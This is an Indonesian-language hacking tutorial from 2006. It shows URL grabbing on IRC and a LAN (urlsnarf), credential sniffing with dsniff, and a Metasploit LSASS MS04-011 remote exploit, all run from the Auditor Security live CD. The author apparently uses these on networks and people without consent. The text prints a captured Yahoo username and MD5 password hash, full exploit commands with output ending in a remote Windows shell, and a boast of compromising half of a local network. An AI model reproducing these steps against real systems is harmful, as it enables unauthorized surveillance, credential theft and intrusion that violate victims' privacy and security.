Hacking - Grabbing URL, Sniffing, dan Remote Exploit

Grabbing URL, Sniffing, dan Remote Exploit

Date: Monday, June 05, 2006 Hits: 3320 By: Herahadi A.N

Auditor security merupakan sebuah system operasi yang bersifat live-system berbasiskan pada knopix.
Menurut penciptanya yang dituliskan pada http://remote-exploit.org , linux Auditor Security diciptakan untuk
memenuhi kebutuhan para excellent-user yang dikombinasikan dengan toolset yang optimal serta penggunakan
yang user friendly. Program program open source pada auditor security menawarkan toolset yang komplit
untuk meng-analysis keamanan sebuah system, byte per byte.
Dalam tulisan ini akan dibahas sebagian dari security tool set yang terdapat pada linux Auditor Security.
A. Grabbing URL
Yang dimaksusd grabbing URL adalah mendapatkan alamat URL yang dikunjungi oleh seseorang tanpa ataupun sepengetahuan
dari orang tersebut. Di bawah akan dibahas mengenai grabbing URL pada suatu channel IRC dan pada jaringan lokal yang
terhubung dengan internet.
1. Grabbing URL pada channel IRC
Untuk melakukan grabbing URL pada channel IRC bisa dilakukan dengan menggunkan XCHAT yang telah tersedia secara bult-in
pada linux auditor. Langkah pertama tentu saja kita harus join ke channel tertentu. Setelah join ke channel tertentu
langkah selanjutnya klik tab Windows kemudian pilih URL Grabber. Tunggu beberapa saat, maka jika ada salah satu user yang
tergabung pada channel tersebut membuka sebuah URL, list dari URL Grabber akan bertambah.
Berikut ini hasil grabbing URL yang penulis lakukan pada channel : #hnet, #skb50, #indonona, #echo, #k-elektronik, #bandung
pada server dalnet tanggal 1 September 2005.
ftp.orghttp://echo.or.id
http://irc.jraxis.com/dalnet/default/
http://kline.dal.net/exploits/akills.htm#ma
http://kline.dal.net/exploits/akills.htm#ma)))
http://kline.dal.net/massads/mup.htm
http://kline.dal.net/proxy/
http://miranda-im.org
http://tiongkokmusic.com:2222/listen.pls
http://unut.hollosite.com
http://valueshells.com
http://valueshells.com/disc.html
http://www.dal.net/
http://www.dal.net/aup/
http://www.equinix.net
http://www.kecoak.or.id
http://www.malanghack.net/
http://www.rayofshadow.or.id
http://www.valueshells.com
irc.hackerszone.orgirc.vsnl.com
www.balihack.or.idwww.bandung-dal.net
WwW.BaNdUnG.tKwww.dal.net/proxies
www.jraxis.comwww.malanghack.net
WwW.PsYcHoPeD.InFowww.scoopsite.com
www.superask.netwww.VALUESHELLS.com
www.ValueShells.comwww.valueshells.com
www.valueshells.comwww.w0nk.org
www.zone-h.org/en/defacements/mirror/id=2840693/>
www.zone-h.org/en/defacements/mirror/id=2840696/>
Daftar URL diatas merupakan daftar dari URL-URL yang dikunjungi para chatter pada channel channel diatas.
Kelemahan dari XCHAT yaitu XCHAT belum mampu secara spesifik mengetahui URL yang dikunjungi tiap chatter.
2. Grabbing URL Pada Jaringan Lokal Yang Terhubung Pada Internet
Selain grabbing URL pada suatu channel IRC kita juga bisa melakukan grabbing URL pada jaringan lokal yang terhubung
pada internet. Untuk melakukanya kita bisa menggunakan URL Snarf. Untuk menjalankan URL Snarf ketikan perintah berikut
pada konsole :
hyraxz@chidori~dove# urlsnarf -i eth0 > ./grabMeBabe.txt
Setelah URL Snarf berhasil dijalankan maka tugas kita selanjutnya adalah tinggal tidur dan membuka hasil grabbing
keesokan hari.Berikut ini satu baris potongan dari hasil grabbing URL yang berhasil penulis capture, penulis hanya
menunjukan 1 baris dari 994 baris hasil grabbing yang didapat mulai dari jam 00:15:37 sampai 06:21:10 pada
tanggal 02/Sep/2005.
192.168.10.5 - - [02/Sep/2005:05:38:37 -0400] "GET http://www.friendster.com/friendrequests.php?lastact=approve&sc=933
HTTP/1.1" - - "http://www.friendster.com/friendrequests.php?statpos=homealerts" "Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.7.5) Gecko/20041128 Firefox/1.0 (Debian package 1.0-4)"
Dari hasil grabbing tersebut maka kita bisa mengambil suatu analisa bahwa komputer dengan IP 192.168.10.5
pada [02/Sep/2005:05:38:37 -0400] dengan menggunakan methode GET sedang mengakses www.friendster.com dan
kemungkinan
besar user tersebut sedang meng-approve friend request. Sangat dimungkinkan browser dari user tersebut adalah
Mozzila/5.0 dengan mamakai sistem operasi linux.
B. Sniffing Menggunakan DSNIFF
Sniffing merupakan usaha yang dilakukan untuk memperoleh suatu informasi tertentu dalam suatu network dangan jalan
meng-capture paket paket data yang ada pada suatu network dan kemudian menganalisinya untuk diambil informasinya
yang dianggap penting. Dsiniff merupakan suatu tool sniffing yang telah tersedia pada linux auditor security.
Untuk memulai sniffing ketikan perintah berikut ini:
hyraxz@chidori~dove# dsniff i eth0 W /mnt/hda5/passwd_HhAN.db
perintah diatas akan memerintahkan dsniff untuk meng-capture paket - paket yang melintasi eth0 dan menuliskan hasilnya
pada sebuah file dengan nama passwd_HhAN.db yang disimpan pada directory /mnt/hda5/.
Untuk membaca hasilnya gunakan perintah berikut ini:
hyraxz@chidori~ dove# dsniff -r /mnt/hda5/passwd_HhAN.db
Atau kalau kita ingin merubahnya dalam format ASCII sehingga file tersebut bisa dibuka menggunakan notepad saat di
Windows,
ketik perintah berikut :
hyraxz@chidori~dove# dsniff -r /mnt/hda5/passwd_HhAN.db > /mnt/hda5/GetDownEnemy.txt
Berikut ini merupakan file ASCII hasil dari sniffing yang berhasil penulis documentasikan :
09/02/05 04:58:42 tcp 192.168.10.7.1183 -> p2.rd.scd.yahoo.com.80 (http)GET
/reg/login1/newym_nouc/lisu/login/us/ym/*http://login.yahoo.com/config/login?.tries=1&.src=ym&.md5=&.hash=&.js=1&.
last=&promo=&.intl=us&.bypass=&.partner=&.u=b261flt1heuai&.v=0&.challenge=Ymjr9vf35ZRMTV9YkEFy0vhTsQz0&.yplus=&.
emailCode=&pkg=&stepid=&.ev=&hasMsgr=1&.chkP=Y&.done=http%3A//mail.yahoo.com&login=rip_zombie
&passwd=ace61b359fa543aceccf111dbd767e74&.persistent=&.hash=1&.md5=1 HTTP/1.1Host: us.rd.yahoo.com
Berikut analysis dari hasil sniffing di atas:
1. Sniffing dilakukan pada tgl 02 September 2005 jam 04:58:42. Sniffing dilakukan pada koneksi TCP antara host dengan
IP 192.168.10.7:1183 dengan server yahoo pada p2.rd.scd.yahoo.com:80 denagan memakai protokol HTTP.
2. User Name untuk login ke server e-mail dari user tersebut adalah rip_zombie dengan password hasil enkripsi
MD5 ace61b359fa543aceccf111dbd767e74 (tanpa tanda petik).
3. Server mail yahoo menggunakan methode enkripsi MD5.
C. Remote Exploit
Remote exploit adalah suatu program yang dijalankan pada computer attacker, digunakan untuk menginjeksi komputer target
sehingga attacker memperoleh hak akses lebih dari yang diijinkan tanpa ataupun sepengetahuan dari korban.
Linux Auditor Security menyediakan tool tersebut dengan nama Metasploit.
Menyusup di Jaringan SKB50 Menggunakan Metasploit
Sebelum memulainya tentu saja komputer attaccker harus di set IP-nya sesuai dengan IP dari jaringan SKB50. berikut ini
konfigurasi IP dari komputer attacker yang telah disesuaikan dengan konfigurasi IP pada jaringan SKB50.
hyraxz@chidori~dove# ifconfig eth0 192.168.0.10 netmask 255.255.255.0
hyraxz@chidori~dove# ifconfig
eth0 Link encap:Ethernet HWaddr 00:E0:18:F3:9A:D0
inet addr:192.168.0.10 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:712 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:69398 (67.7 KiB) TX bytes:595 (595.0 b)
Interrupt:5 Base address:0x9800
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:10 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:500 (500.0 b) TX bytes:500 (500.0 b)
Selanjutnya ketikan perintah dibawah ini untuk memanggil console metasploit :
hyraxz@chidori~dove# cd /opt/auditor/metasploit
hyraxz@chidori~dove# ./msfconsole
jika berhasil maka akan muncul tulisan seperti berikut ini :
888 888 d8b888
888 888 Y8P888
888 888 888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888
888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
888
888
888
+ -- --=[ msfconsole v2.4 [75 exploits - 75 payloads]
msf >
untuk memulai penggunakanya ketikan perintah-perintah dibawah ini:
msf > show exploits
Metasploit Framework Loaded Exploits
====================================
3com_3cdaemon_ftp_overflow 3Com 3CDaemon FTP Server Overflow
Credits
afp_loginext
aim_goaway
apache_chunked_win32
arkeia_agent_access
arkeia_type77_macos
arkeia_type77_win32
backupexec_ns
bakbone_netvault_heap
blackice_pam_icq
cabrightstor_disco
cabrightstor_disco_servicepc
cabrightstor_uniagent
calicclnt_getconfig
calicserv_getconfig
distcc_exec
exchange2000_xexch50
globalscapeftp_user_input
ia_webmail
icecast_header
iis40_htr
iis50_printer_overflow
iis50_webdav_ntdll
iis_fp30reg_chunked
iis_nsiislog_post
Metasploit Framework Credits
AppleFileServer LoginExt PathName Overflow
AOL Instant Messenger goaway Overflow
Apache Win32 Chunked Encoding
Arkeia Backup Client Remote Access
Arkeia Backup Client Type 77 Overflow (Mac OS X)
Arkeia Backup Client Type 77 Overflow (Win32)
Veritas Backup Exec Name Service Overflow
BakBone NetVault Remote Heap Overflow
ISS PAM.dll ICQ Parser Buffer Overflow
CA BrightStor Discovery Service Overflow
CA BrightStor Discovery Service SERVICEPC Overflo
CA BrightStor Universal Agent Overflow
CA License Client GETCONFIG Overflow
CA License Server GETCONFIG Overflow
DistCC Daemon Command Execution
Exchange 2000 MS03-46 Heap Overflow
GlobalSCAPE Secure FTP Server user input overflow
IA WebMail 3.x Buffer Overflow
Icecast (<= 2.0.1) Header Overwrite (win32)
IIS 4.0 .HTR Buffer Overflow
IIS 5.0 Printer Buffer Overflow
IIS 5.0 WebDAV ntdll.dll Overflow
IIS FrontPage fp30reg.dll Chunked Overflow
IIS nsiislog.dll ISAPI POST Overflow
iis_source_dumper
iis_w3who_overflow
imail_imap_delete
imail_ldap
irix_lpsched_exec
lsass_ms04_011
maxdb_webdbm_get_overflow
mercantec_softcart
minishare_get_overflow
msasn1_ms04_007_killbill
msmq_deleteobject_ms05_017
msrpc_dcom_ms03_026
mssql2000_preauthentication
mssql2000_resolution
netterm_netftpd_user_overflow
openview_omniback
oracle9i_xdb_ftp
oracle9i_xdb_ftp_pass
payload_handler
poptop_negative_read
realserver_describe_linux
samba_nttrans
samba_trans2open
samba_trans2open_osx
samba_trans2open_solsparc
sambar6_search_results
IIS Web Application Source Code Disclosure
IIS w3who.dll ISAPI Overflow
IMail IMAP4D Delete Overflow
IMail LDAP Service Buffer Overflow
Irix lpsched Command Execution
Microsoft LSASS MSO4-011 Overflow
MaxDB WebDBM GET Buffer Overflow
Mercantec SoftCart CGI Overflow
Minishare 1.41 Buffer Overflow
Microsoft ASN.1 Library Bitstring Heap Overflow
Microsoft Message Queueing Service MSO5-017
Microsoft RPC DCOM MSO3-026
MSSQL 2000/MSDE Hello Buffer Overflow
MSSQL 2000/MSDE Resolution Overflow
NetTerm NetFTPD USER Buffer Overflow
HP OpenView Omniback II Command Execution
Oracle 9i XDB FTP UNLOCK Overflow (win32)
Oracle 9i XDB FTP PASS Overflow (win32)
Metasploit Framework Payload Handler
Poptop Negative Read Overflow
RealServer Describe Buffer Overflow
Samba Fragment Reassembly Overflow
Samba trans2open Overflow
Samba trans2open Overflow (Mac OS X)
Samba trans2open Overflow (Solaris SPARC)
Sambar 6 Search Results Buffer Overflow
seattlelab_mail_55
sentinel_lm7_overflow
servu_mdtm_overflow
smb_sniffer
solaris_dtspcd_noir
solaris_kcms_readfile
solaris_lpd_exec
solaris_sadmind_exec
solaris_snmpxdmid
solaris_ttyprompt
squid_ntlm_authenticate
svnserve_date
trackercam_phparg_overflow
uow_imap4_copy
uow_imap4_lsub
ut2004_secure_linux
ut2004_secure_win32
warftpd_165_pass
warftpd_165_user
webstar_ftp_user
windows_ssl_pct
wins_ms04_045
wsftp_server_503_mkd
Seattle Lab Mail 5.5 POP3 Buffer Overflow
SentinelLM UDP Buffer Overflow
Serv-U FTPD MDTM Overflow
SMB Password Capture Service
Solaris dtspcd Heap Overflow
Solaris KCMS Arbitary File Read
Solaris LPD Command Execution
Solaris sadmind Command Execution
Solaris snmpXdmid AddComponent Overflow
Solaris in.telnetd TTYPROMPT Buffer Overflow
Squid NTLM Authenticate Overflow
Subversion Date Svnserve
TrackerCam PHP Argument Buffer Overflow
University of Washington IMAP4 COPY Overflow
University of Washington IMAP4 LSUB Overflow
Unreal Tournament 2004 "secure" Overflow (Linux)
Unreal Tournament 2004 "secure" Overflow (Win32)
War-FTPD 1.65 PASS Overflow
War-FTPD 1.65 USER Overflow
WebSTAR FTP Server USER Overflow
Microsoft SSL PCT MS04-011 Overflow
Microsoft WINS MS04-045 Code Execution
WS-FTP Server 5.03 MKD Overflow
msf > use lsass_ms04_011
msf lsass_ms04_011 > show payloads
Metasploit Framework Usable Payloads
====================================
win32_adduser
win32_bind
win32_bind_dllinject
win32_bind_meterpreter
win32_bind_stg
win32_bind_stg_upexec
win32_bind_vncinject
win32_exec
win32_passivex
win32_passivex_meterpreter
win32_passivex_stg
win32_passivex_vncinject
win32_reverse
win32_reverse_dllinject
win32_reverse_meterpreter
win32_reverse_ord
win32_reverse_ord_vncinject
win32_reverse_stg
win32_reverse_stg_upexec
win32_reverse_vncinject
Windows Execute net user /ADD
Windows Bind Shell
Windows Bind DLL Inject
Windows Bind Meterpreter DLL Inject
Windows Staged Bind Shell
Windows Staged Bind Upload/Execute
Windows Bind VNC Server DLL Inject
Windows Execute Command
Windows PassiveX ActiveX Injection Payload
Windows PassiveX ActiveX Inject Meterpreter Payload
Windows Staged PassiveX Shell
Windows PassiveX ActiveX Inject VNC Server Payload
Windows Reverse Shell
Windows Reverse DLL Inject
Windows Reverse Meterpreter DLL Inject
Windows Staged Reverse Ordinal Shell
Windows Reverse Ordinal VNC Server Inject
Windows Staged Reverse Shell
Windows Staged Reverse Upload/Execute
Windows Reverse VNC Server Inject
msf lsass_ms04_011 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf lsass_ms04_011(win32_bind) > set RHOST 192.168.0.27
RHOST -> 192.168.0.27
msf lsass_ms04_011(win32_bind) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ------------ ------------------
required RHOST 192.168.0.19 The target address
required RPORT 139 The target port
Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell
Target: Automatic
msf lsass_ms04_011(win32_bind) > exploit
RHOST -> 192.168.0.27
msf lsass_ms04_011(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Detected a Windows XP target (KICKS)
[*] Windows XP may require two attempts
[*] Sending 8 DCE request fragments...
[*] Sending the final DCE fragment
[*] Got connection from 192.168.0.10:1382 <-> 192.168.0.27:4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32> netstat -a
netstat -a
Active Connections
Protocol Local Address Foreign Address State
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
kicks:epmap
kicks:microsoft-ds
kicks:1025
kicks:1056
kicks:1090
kicks:1095
kicks:1098
kicks:1130
kicks:4444
kicks:5000
kicks:netbios-ssn
0.0.0.0:0
0.0.0.0:0
0.0.0.0:0
0.0.0.0:0
0.0.0.0:0
0.0.0.0:0
0.0.0.0:0
0.0.0.0:0
0.0.0.0:0
0.0.0.0:0
0.0.0.0:0
LISTENING
LISTENING
LISTENING
LISTENING
LISTENING
LISTENING
LISTENING
LISTENING
LISTENING
LISTENING
LISTENING
TCP
TCP
TCP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
kicks:1162
kicks:1169
kicks:4444
kicks:microsoft-ds
kicks:isakmp
kicks:ntp
kicks:1900
kicks:ntp
kicks:netbios-ns
kicks:netbios-dgm
kicks:1900
0.0.0.0:0
0.0.0.0:0
192.168.0.10:1382
*:*
*:*
*:*
*:*
*:*
*:*
*:*
*:*
LISTENING
LISTENING
ESTABLISHED
^c
Caught interrupt, exit connection? [y/n]y
msf lsass_ms04_011(win32_bind) >
Analisa dari hasil aktivitas diatas adalah sebagai berikut :
metasploit meng-attack korban melalui port 139 kemudian memasukan payload yang akan membangun hubungan antara
korban
dengan attacker dengan menggunakan mode koneksi TCP, dimana hubungan dilakukan melalui port 4444 pada sisi korban
dan port 1382 pada sisi attacker.Setelah bind port antara attacker dengan korban terbentuk maka attacker menguasai
sepenuhnya aktifitas dari komputer korban. Dari 12 komputer yang hidup saat analisa dilakukan pada jaringan lokal
SKB50 6 buah komputer mampu di tembus dengan menggunakan metasploit, ini berarti bahwa 50% jaringan SKB50 pada saat
itu ada di tangan attacker ;).
Daftar Pustaka :
Fwerd (Kecoak Elektronik), Memanen Password Di Jaringan Lokal dengan dsniff,
Terbitan Online Kecoak Elektronik http://k-elektronik.co.id.
From Exploit, http://new.remote-exploit.org/index.php/Auditor_main.
This document was created with Win2PDF available at http://www.daneprairie.com.
The unregistered version of Win2PDF is for evaluation or non-commercial use only.
Category: 0 komentar